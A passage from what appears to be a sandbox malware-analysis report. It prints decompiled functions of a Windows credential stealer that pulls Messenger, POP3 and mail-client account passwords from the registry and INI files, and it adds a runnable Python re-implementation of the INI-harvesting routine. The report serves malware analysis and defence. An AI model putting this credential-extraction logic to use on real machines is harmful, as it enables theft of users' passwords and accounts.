                                                  					return _v16;
                                                  				}
                                                  				_t43 = _t39 + 1;
                                                  				if(_v12 <= _t43) {		// value of one byte or less: nothing to recover
                                                  					goto L13;
                                                  				}
                                                  				_t74 = _v1580 - 0x20;
                                                  				_v8 = 0;
                                                  				if(_v1580 >= 0x20) {		// first byte printable: value is stored in clear
                                                  					_v8 = _t43;
                                                  					L10:
                                                  					if(_v8 != _t67) {
                                                  						_v557 = 0;		// terminate the 0x400-byte buffer
                                                  						E00401380( &_v1580,  &(_t63[0x100]), 0xff);		// bounded copy of the password to output+0x100
                                                  						_v8 = 0xff;
                                                  						_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
                                                  						if(_t48 == 0) {
                                                  							_t63[0xfe] = _t48;		// NUL-terminate both fields (_t48 is 0 here)
                                                  							_t63[0x1fe] = _t48;
                                                  							_v16 = 1;
                                                  						}
                                                  					}
                                                  					goto L13;
                                                  				}
                                                  				// First byte below 0x20: the value is an opaque blob handed to the E004046D7 /
                                                  				// E004047A0 / E00404811 helpers. _v32/_v28 and _v24/_v20 have the {length, pointer}
                                                  				// layout of a DATA_BLOB and the output is released with LocalFree, which is
                                                  				// consistent with a CryptUnprotectData wrapper (inference, not confirmed here).
                                                  				_t69 =  &_v556;
                                                  				E004046D7( &_v556);
                                                  				if(E004047A0(_t69, _t74) == 0) {
                                                  					L8:
                                                  					E004047F1( &_v556);
                                                  					_t67 = 0;
                                                  					goto L10;
                                                  				}
                                                  				_v32 = _v12 + 0xfffffffe;		// blob length = value length - 2
                                                  				_v28 =  &_v1578;		// blob data starts at the third byte of the value
                                                  				if(E00404811(_t69,  &_v32, 0,  &_v24) == 0) {
                                                  					goto L8;
                                                  				}
                                                  				if(_v24 < 0x400) {
                                                  					memcpy( &_v1580, _v20, _v24);		// decoded bytes replace the raw value
                                                  					_v8 = 1;
                                                  				}
                                                  				LocalFree(_v20);
                                                  				goto L8;
                                                  			}

                                                  Instruction addresses for the decompiled lines above: 0x0040d4a6, 0x0040d4bf, 0x0040d4cf, 0x0040d4d2, 0x0040d4d5, 0x0040d4dd, 0x0040d5c7, 0x0040d5cc, 0x0040d5d8, 0x0040d5d8, 0x0040d4e3, 0x0040d4e7, 0x00000000, 0x00000000, 0x0040d4ed, 0x0040d4f4, 0x0040d4f7, 0x0040d56d, 0x0040d570, 0x0040d573, 0x0040d587, 0x0040d58e, 0x0040d5a7, 0x0040d5aa, 0x0040d5b2, 0x0040d5b4, 0x0040d5ba, 0x0040d5c0, 0x0040d5c0, 0x0040d5b2, 0x00000000, 0x0040d573, 0x0040d4f9, 0x0040d4ff, 0x0040d50b, 0x0040d55e, 0x0040d564, 0x0040d569, 0x00000000, 0x0040d569, 0x0040d513, 0x0040d51c, 0x0040d532, 0x00000000, 0x00000000, 0x0040d537, 0x0040d546, 0x0040d54e, 0x0040d54e, 0x0040d558, 0x00000000

                                                  APIs
                                                  • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,75D6F420), ref: 0040D4D5
                                                  • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040D5AA
                                                    • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                    • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                    • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                  • memcpy.MSVCRT ref: 0040D546
                                                  • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040D558
                                                  • RegCloseKey.ADVAPI32(?), ref: 0040D5CC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                                                  • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                                  • API String ID: 3289975857-105384665
                                                  • Opcode ID: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                  • Instruction ID: 7f1cec63b8765f81c3836bbc11e71f1516ceea0880c28a2d93855dc55ce36bd3
                                                  • Opcode Fuzzy Hash: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                  • Instruction Fuzzy Hash: AE314DB1D01219AFDB11DF94CC44BDEBBB9AF48318F1040B6E905B7290D6789B94CF99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 89%
                                                  			E0040706C(void* __ecx, intOrPtr* _a4, intOrPtr _a8, char _a12) {
                                                  				char _v12;
                                                  				short* _v16;
                                                  				char _v20;
                                                  				char* _v24;
                                                  				char _v28;
                                                  				char _v288;
                                                  				char _v544;
                                                  				char _v800;
                                                  				char _v1056;
                                                  				char _v1584;
                                                  				void _v2607;
                                                  				char _v2608;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t36;
                                                  				void* _t63;
                                                  				char* _t66;
                                                  				void* _t68;
                                                  
                                                  				_t63 = __ecx;
                                                  				_v2608 = 0;
                                                  				memset( &_v2607, 0, 0x3ff);
                                                  				_v12 = 0x400;
                                                  				_v1056 = 0;
                                                  				_v800 = 0;
                                                  				_v544 = 0;
                                                  				_v288 = 0;
                                                  				_t36 = E0040EBA3(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12);
                                                  				_t72 = _t36;
                                                  				if(_t36 != 0) {
                                                  					return _t36;
                                                  				}
                                                  				_t67 =  &_v1584;
                                                  				E004046D7( &_v1584);
                                                  				if(E004047A0( &_v1584, _t72) != 0) {
                                                  					_v24 =  &_v2608;
                                                  					_v28 = _v12;
                                                  					_t16 =  &_v20; // 0x407221
                                                  					if(E00404811(_t67,  &_v28, 0, _t16) != 0) {
                                                  						_t19 =  &_v20; // 0x407221
                                                  						 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16,  *_t19 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0;
                                                  						LocalFree(_v16);
                                                  						E0040EB80(0xff, _t63, _a8, "POP3_name",  &_v800);
                                                  						E0040EB80(0xff, _t63, _a8, "POP3_host",  &_v288);
                                                  						_t28 =  &_a12; // 0x407221
                                                  						_t66 =  &_v1056;
                                                  						E004060D0(0xff, _t66,  *_t28);
                                                  						 *((intOrPtr*)( *_a4))(_t66);
                                                  					}
                                                  				}
                                                  				return E004047F1( &_v1584);
                                                  			}

                                                  Instruction addresses for the decompiled lines above: 0x0040706c, 0x00407087, 0x0040708d, 0x004070a5, 0x004070ac, 0x004070b2, 0x004070b8, 0x004070be, 0x004070c4, 0x004070cc, 0x004070ce, 0x00407199, 0x00407199, 0x004070d4, 0x004070da, 0x004070e6, 0x004070f2, 0x004070f8, 0x004070fb, 0x0040710d, 0x0040711d, 0x00407131, 0x00407138, 0x00407154, 0x0040716a, 0x0040716f, 0x00407172, 0x00407178, 0x00407188, 0x00407188, 0x0040710d, 0x00000000

                                                  APIs
                                                  • memset.MSVCRT ref: 0040708D
                                                    • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                    • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                    • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                    • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,!r@,?,000000FD,00000000,00000000,?,00000000,!r@,?,?,?,?,00000000), ref: 00407128
                                                  • LocalFree.KERNEL32(?,?,?,?,?,00000000,75D6ED80,?), ref: 00407138
                                                    • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                    • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                    • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
                                                  • String ID: !r@$!r@$POP3_credentials$POP3_host$POP3_name
                                                  • API String ID: 604216836-250559020
                                                  • Opcode ID: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                  • Instruction ID: f8ca724a3b3a12fba31c48434a973b8369f3aae8d57bdfed2f45406e53e98f37
                                                  • Opcode Fuzzy Hash: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                  • Instruction Fuzzy Hash: C331707194021CAFDB11EB698C81ADE7BBCEF19344F0084B6FA05A2281D6389B598F65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E00405E46(long __edi, char* _a4) {
                                                  				char _v8;
                                                  				void* _t8;
                                                  				void* _t10;
                                                  				long _t14;
                                                  				long _t24;
                                                  
                                                  				_t24 = __edi;
                                                  				_t1 = _t24 - 0x834; // -2100
                                                  				_t8 = 0;
                                                  				_t14 = 0x1100;
                                                  				if(_t1 <= 0x383) {
                                                  					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
                                                  					if(0 != 0) {
                                                  						_t14 = 0x1900;
                                                  					}
                                                  				}
                                                  				if(FormatMessageA(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                  					_t10 = strcpy(_a4, "Unknown Error");
                                                  				} else {
                                                  					if(strlen(_v8) < 0x400) {
                                                  						strcpy(_a4, _v8);
                                                  					}
                                                  					_t10 = LocalFree(_v8);
                                                  				}
                                                  				return _t10;
                                                  			}

                                                  Instruction addresses for the decompiled lines above: 0x00405e46, 0x00405e4c, 0x00405e54, 0x00405e5c, 0x00405e61, 0x00405e6b, 0x00405e73, 0x00405e75, 0x00405e75, 0x00405e73, 0x00405e91, 0x00405ec0, 0x00405e93, 0x00405e9e, 0x00405ea6, 0x00405eac, 0x00405eb0, 0x00405eb0, 0x00405eca

                                                  APIs
                                                  • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F65,?,?), ref: 00405E6B
                                                  • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F65,?,?), ref: 00405E89
                                                  • strlen.MSVCRT ref: 00405E96
                                                  • strcpy.MSVCRT(?,?,?,?,00405F65,?,?), ref: 00405EA6
                                                  • LocalFree.KERNEL32(?,?,?,00405F65,?,?), ref: 00405EB0
                                                  • strcpy.MSVCRT(?,Unknown Error,?,?,00405F65,?,?), ref: 00405EC0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                  • String ID: Unknown Error$netmsg.dll
                                                  • API String ID: 3198317522-572158859
                                                  • Opcode ID: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                  • Instruction ID: 3a45a8761f4bc18c8cc8ce1e33cdf84813ecacbbbbff7bb38409c5e389e3efd7
                                                  • Opcode Fuzzy Hash: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                  • Instruction Fuzzy Hash: A901B131604118BAE7155B61ED46EDF7E6DDB14792B20443AF602F00A0DA785F409A98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E0040875C(void* __eax, void* __eflags, signed int _a4, short _a8) {
                                                  				char _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t96;
                                                  				signed int _t98;
                                                  				void* _t99;
                                                  				signed int _t104;
                                                  				signed short _t107;
                                                  				signed int _t110;
                                                  				intOrPtr _t114;
                                                  				signed int _t117;
                                                  				signed int _t119;
                                                  				signed short _t121;
                                                  				signed int _t122;
                                                  				signed int _t152;
                                                  				signed int _t156;
                                                  				signed int _t158;
                                                  				signed int _t161;
                                                  				signed int _t163;
                                                  				signed int _t168;
                                                  				signed int _t169;
                                                  				signed int _t170;
                                                  				void* _t172;
                                                  				void* _t173;
                                                  				void* _t174;
                                                  				void* _t178;
                                                  				intOrPtr _t180;
                                                  
                                                  				_t174 = __eflags;
                                                  				_t172 = __eax;
                                                  				E00408572(__eax);
                                                  				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
                                                  				_t122 = 0xd;
                                                  				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
                                                  				_t156 = 0x14;
                                                  				_t96 = _t122 * _t156;
                                                  				 *(_t172 + 0x1b0) = _t122;
                                                  				_push( ~(0 | _t174 > 0x00000000) | _t96);
                                                  				L004115D0();
                                                  				 *(_t172 + 0x1b4) = _t96;
                                                  				_t158 = 0x10;
                                                  				_t98 = _t122 * _t158;
                                                  				_push( ~(0 | _t174 > 0x00000000) | _t98);
                                                  				L004115D0();
                                                  				 *(_t172 + 0x34) = _t98;
                                                  				_v8 = 0x4168e0;
                                                  				do {
                                                  					_t21 =  &_v8; // 0x4168e0
                                                  					_t99 =  *_t21;
                                                  					_t168 =  *_t99;
                                                  					_v12 = _t168;
                                                  					_t169 = _t168 * 0x14;
                                                  					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
                                                  					_t24 =  &_v8; // 0x4168e0
                                                  					_t104 = _v12 << 4;
                                                  					_v12 = _t104;
                                                  					memcpy( *(_t172 + 0x34) + _t104,  *_t24 + 0x14, 0x10);
                                                  					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
                                                  					_t173 = _t173 + 0x18;
                                                  					_v16 = _t107;
                                                  					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
                                                  					if((_t107 & 0xffff0000) == 0) {
                                                  						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E004078FF(_t107 & 0x0000ffff);
                                                  						_t121 = E004078FF(_v16 | 0x00010000);
                                                  						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
                                                  						_t122 = 0xd;
                                                  					}
                                                  					_v8 = _v8 + 0x24;
                                                  					_t178 = _v8 - 0x416ab4;
                                                  				} while (_t178 < 0);
                                                  				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
                                                  				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
                                                  				_t161 = 4;
                                                  				_t110 = _t122 * _t161;
                                                  				 *(_t172 + 0x20) = _t122;
                                                  				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
                                                  				_push( ~(0 | _t178 > 0x00000000) | _t110);
                                                  				L004115D0();
                                                  				_push(0xc);
                                                  				 *(_t172 + 0x24) = _t110;
                                                  				L004115D0();
                                                  				_t170 = _t110;
                                                  				if(_t170 == 0) {
                                                  					_t170 = 0;
                                                  					__eflags = 0;
                                                  				} else {
                                                  					_t114 =  *((intOrPtr*)(_t172 + 0x48));
                                                  					_t180 = _t114;
                                                  					_a8 = _t114;
                                                  					if(_t180 == 0) {
                                                  						_a8 = 0x64;
                                                  					}
                                                  					 *((intOrPtr*)(_t170 + 8)) = _a4;
                                                  					_t163 = 4;
                                                  					_t117 = _t122 * _t163;
                                                  					 *(_t170 + 4) = _t122;
                                                  					_push( ~(0 | _t180 > 0x00000000) | _t117);
                                                  					L004115D0();
                                                  					_a4 = _a4 & 0x00000000;
                                                  					 *_t170 = _t117;
                                                  					do {
                                                  						_t152 = _a4;
                                                  						_t119 = _t152 << 2;
                                                  						_a4 = _a4 + 1;
                                                  						 *( *_t170 + _t119 + 2) = _t152;
                                                  						 *((short*)(_t119 +  *_t170)) = _a8;
                                                  					} while (_a4 < _t122);
                                                  				}
                                                  				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
                                                  				 *(_t172 + 0x1a0) = _t170;
                                                  				 *((intOrPtr*)(_t172 + 0x40)) = 1;
                                                  				 *((intOrPtr*)(_t172 + 0x198)) = 1;
                                                  				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
                                                  				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
                                                  				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
                                                  				return E004086DC(_t172);
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                    • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00408793
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004087AF
                                                  • memcpy.MSVCRT ref: 004087D7
                                                  • memcpy.MSVCRT ref: 004087F4
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040887D
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00408887
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004088BF
                                                    • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                    • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                    • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74B04DE0), ref: 0040797A
                                                    • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
                                                  • String ID: d$hA
                                                  • API String ID: 3781940870-4030989184
                                                  • Opcode ID: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                  • Instruction ID: 2ee817cab8fb9d662dc1fdc17dcda2a390100e1008d8253a008a3d74f0a2914d
                                                  • Opcode Fuzzy Hash: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                  • Instruction Fuzzy Hash: 76518D72A01704AFDB24DF2AC582B9AB7E5FF48354F10852EE54ADB391EB74E940CB44

                                                  C-Code - Quality: 67%
                                                  			E0040314D(void* __eax, intOrPtr _a4, char* _a8) {
                                                  				signed int _v8;
                                                  				intOrPtr _v12;
                                                  				char _v188;
                                                  				char _v268;
                                                  				char _v524;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				char* _t53;
                                                  				void* _t60;
                                                  				void* _t65;
                                                  				char* _t70;
                                                  
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_t65 = __eax;
                                                  				 *((intOrPtr*)(__eax + 0x8c)) = 3;
                                                  				 *((intOrPtr*)(__eax + 0x210)) = 1;
                                                  				E0040311F(_a4, "UsesIMAP",  &_v524, 0xff, _a8);
                                                  				if(_v524 == 0x31) {
                                                  					 *((intOrPtr*)(_t65 + 0x210)) = 2;
                                                  				}
                                                  				_v12 = _t65 + 0x110;
                                                  				E0040311F(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
                                                  				_t70 = _t65 + 0x214;
                                                  				E0040311F(_a4, "LoginName", _t70, 0x7f, _a8);
                                                  				E0040311F(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
                                                  				E0040311F(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
                                                  				E0040311F(_a4, "SavePasswordText",  &_v268, 0xff, _a8);
                                                  				if(_v268 != 0) {
                                                  					_v188 = 0;
                                                  					E00401D5A( &_v268, _t65 + 0x294);
                                                  					if( *_t70 == 0) {
                                                  						_push(_a8);
                                                  						_t60 = 0x7f;
                                                  						_push(_t60);
                                                  						_push(_t70);
                                                  						_push("PopAccount");
                                                  						_push(_a4);
                                                  						E0040311F();
                                                  						if( *_t70 != 0) {
                                                  							_t53 = strchr(_t70, 0x40);
                                                  							_a8 = _t53;
                                                  							if(_t53 != 0) {
                                                  								E004060D0(_t60, _v12,  &(_t53[1]));
                                                  								 *_a8 = 0;
                                                  							}
                                                  						}
                                                  					}
                                                  					_v8 = 1;
                                                  				}
                                                  				if( *_t70 != 0) {
                                                  					_v8 = 1;
                                                  				}
                                                  				return _v8;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 0040311F: GetPrivateProfileStringA.KERNEL32(00000000,?,Function_00012466,?,?,?), ref: 00403143
                                                  • strchr.MSVCRT ref: 00403262
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: PrivateProfileStringstrchr
                                                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                  • API String ID: 1348940319-1729847305
                                                  • Opcode ID: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                  • Instruction ID: 1cfb9ddeec5dd782170234712f417fe000b4b626ad5f21becf6162a2306db812
                                                  • Opcode Fuzzy Hash: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                  • Instruction Fuzzy Hash: 7631B370A04209BEEF119F20CC06FD97F6CAF14318F10816AF95C7A1D2C7B95B958B54
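The function E0040314D above reads one mail account out of an INI file through GetPrivateProfileStringA and falls back to splitting PopAccount at '@' when LoginName is empty. The following Python is an added analyst re-implementation of that logic, not code from the sample or from this report. It assumes one INI section per account with the keys listed in the String ID above (the key set matches Eudora's account INI, which is an inference, not something the report states), stands in configparser for the Win32 INI reader, keeps the SavePasswordText value raw because the decoder E00401D5A is not reproduced, and runs on a constructed INI so it can be executed offline:

```python
# Added analyst re-implementation of the account-harvesting logic decompiled
# as E0040314D. Illustration code, not from the sample or the sandbox report.
# Assumptions: one INI section per account, keys as in the report's String ID,
# configparser in place of GetPrivateProfileStringA, password decoder E00401D5A
# not reproduced, and a constructed INI as input.
import configparser

# Buffer sizes passed to the INI reader in the decompiled code; the Win32 API
# reserves one byte for the terminator, so at most size-1 characters survive.
_SIZES = {
    "UsesIMAP": 0xFF, "PopServer": 0x7F, "LoginName": 0x7F, "RealName": 0x7F,
    "ReturnAddress": 0x7F, "SavePasswordText": 0xFF, "PopAccount": 0x7F,
}


def _ini_reader(ini_text, section):
    """Return a getter that mimics GetPrivateProfileStringA for one section."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case exactly as written in the INI
    cp.read_string(ini_text)

    def get(key):
        return cp.get(section, key, fallback="")[: _SIZES[key] - 1]

    return get


def harvest_account(ini_text, section):
    """Mirror E0040314D: return (account dict, found).

    found is 1 when a saved password or a login name was recovered, which is
    the value the decompiled function returns in _v8."""
    get = _ini_reader(ini_text, section)
    acct = {
        # *(this+0x210): 1 = POP3 by default, 2 when UsesIMAP == "1"
        "protocol": "IMAP" if get("UsesIMAP") == "1" else "POP3",
        "server": get("PopServer"),              # this+0x110
        "login": get("LoginName"),               # this+0x214
        "realname": get("RealName"),             # this+0x0c
        "return_address": get("ReturnAddress"),  # this+0x90
        "password_blob": "",
    }
    found = 0
    saved = get("SavePasswordText")
    if saved:
        # "_v188 = 0" cuts the saved text to 80 bytes before it is decoded
        acct["password_blob"] = saved[:80]
        if not acct["login"]:
            # Fallback: PopAccount holds "user@host"; strchr(buf, '@') splits it,
            # the host goes into the PopServer slot and the '@' is overwritten
            # with a terminator so the login keeps only the user part.
            pop_account = get("PopAccount")
            if pop_account:
                user, at, host = pop_account.partition("@")
                acct["login"] = user
                if at:
                    acct["server"] = host
        found = 1
    if acct["login"]:
        found = 1
    return acct, found


# Constructed sample INI (not taken from the report) exercising the fallback.
SAMPLE_INI = """[Settings]
UsesIMAP=1
PopServer=
LoginName=
RealName=Alice Example
ReturnAddress=alice@example.test
SavePasswordText=ABCDEF
PopAccount=alice@mail.example.test
"""

if __name__ == "__main__":
    print(harvest_account(SAMPLE_INI, "Settings"))
```

Running it on the constructed INI yields login "alice" and server "mail.example.test" taken from PopAccount, which is the field an analyst should expect in the exfiltrated data even when the client never stored a separate LoginName.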

                                                  C-Code - Quality: 16%
                                                  			E0040F09D(char* __eax, void* __ecx) {
                                                  				void* _t2;
                                                  				char* _t3;
                                                  				void* _t5;
                                                  				void* _t6;
                                                  				void* _t7;
                                                  
                                                  				_t3 = __eax;
                                                  				_t6 = __ecx;
                                                  				_t5 = 4;
                                                  				while(1) {
                                                  					_t2 =  *_t3;
                                                  					if(_t2 != 0x3c) {
                                                  						goto L3;
                                                  					}
                                                  					_push(_t5);
                                                  					_push("&lt;");
                                                  					L14:
                                                  					_t2 = memcpy(_t6, ??, ??);
                                                  					_t7 = _t7 + 0xc;
                                                  					_t6 = _t6 + _t5;
                                                  					L16:
                                                  					if( *_t3 != 0) {
                                                  						_t3 = _t3 + 1;
                                                  						continue;
                                                  					}
                                                  					return _t2;
                                                  					L3:
                                                  					if(_t2 != 0x3e) {
                                                  						if(_t2 != 0x22) {
                                                  							if(_t2 != 0xb0) {
                                                  								if(_t2 != 0x26) {
                                                  									if(_t2 != 0xa) {
                                                  										 *_t6 = _t2;
                                                  										_t6 = _t6 + 1;
                                                  									} else {
                                                  										_push(_t5);
                                                  										_push("<br>");
                                                  										goto L14;
                                                  									}
                                                  								} else {
                                                  									_push(5);
                                                  									_push("&amp;");
                                                  									goto L11;
                                                  								}
                                                  							} else {
                                                  								_push(5);
                                                  								_push("&deg;");
                                                  								L11:
                                                  								_t2 = memcpy(_t6, ??, ??);
                                                  								_t7 = _t7 + 0xc;
                                                  								_t6 = _t6 + 5;
                                                  							}
                                                  						} else {
                                                  							_t2 = memcpy(_t6, "&quot;", 6);
                                                  							_t7 = _t7 + 0xc;
                                                  							_t6 = _t6 + 6;
                                                  						}
                                                  					} else {
                                                  						_push(_t5);
                                                  						_push("&gt;");
                                                  						goto L14;
                                                  					}
                                                  					goto L16;
                                                  				}
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                  • API String ID: 3510742995-3273207271
                                                  • Opcode ID: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                  • Instruction ID: 3259d816fa1e591736f6461b451ad75962e4f861ee845343ab42ffe8f3feec31
                                                  • Opcode Fuzzy Hash: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                  • Instruction Fuzzy Hash: 450171B2E852A4B5DA350905AC07FA70B865BA6B11F350037F58639AC2E1AD0D8F516F

                                                  C-Code - Quality: 69%
                                                  			E0040D865(intOrPtr* _a4) {
                                                  				char _v260;
                                                  				char _v516;
                                                  				void _v771;
                                                  				char _v772;
                                                  				intOrPtr _v776;
                                                  				intOrPtr _v780;
                                                  				intOrPtr _v788;
                                                  				int _v796;
                                                  				char _v800;
                                                  				signed int _v804;
                                                  				char _v808;
                                                  				char _v812;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr* _t52;
                                                  				void* _t53;
                                                  				void* _t57;
                                                  				signed int _t58;
                                                  				char* _t65;
                                                  				unsigned int _t68;
                                                  				intOrPtr _t69;
                                                  				void* _t85;
                                                  				char* _t89;
                                                  				intOrPtr _t92;
                                                  				intOrPtr* _t93;
                                                  				signed int _t94;
                                                  				void* _t96;
                                                  
                                                  				_t52 = _a4;
                                                  				_t96 = (_t94 & 0xfffffff8) - 0x32c;
                                                  				_push(_t85);
                                                  				 *((intOrPtr*)(_t52 + 4)) = 0;
                                                  				 *((intOrPtr*)(_t52 + 8)) = 0;
                                                  				_t89 = 0;
                                                  				_t53 = E00406278();
                                                  				_t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
                                                  				if( *((intOrPtr*)(_t53 + 4)) > 5) {
                                                  					_t89 = L"WindowsLive:name=*";
                                                  				}
                                                  				_v800 = 0;
                                                  				_v796 = 0;
                                                  				if(E00404647( &_v800, _t85, _t97) == 0) {
                                                  					L21:
                                                  					return E004046C2( &_v800);
                                                  				}
                                                  				_v808 = 0;
                                                  				_v812 = 0;
                                                  				if(_v780 == 0) {
                                                  					_t57 = 0;
                                                  					__eflags = 0;
                                                  				} else {
                                                  					_t57 = _v776(_t89, 0,  &_v812,  &_v808);
                                                  				}
                                                  				if(_t57 == 0) {
                                                  					goto L21;
                                                  				} else {
                                                  					_t58 = 0;
                                                  					_v804 = 0;
                                                  					if(_v812 <= 0) {
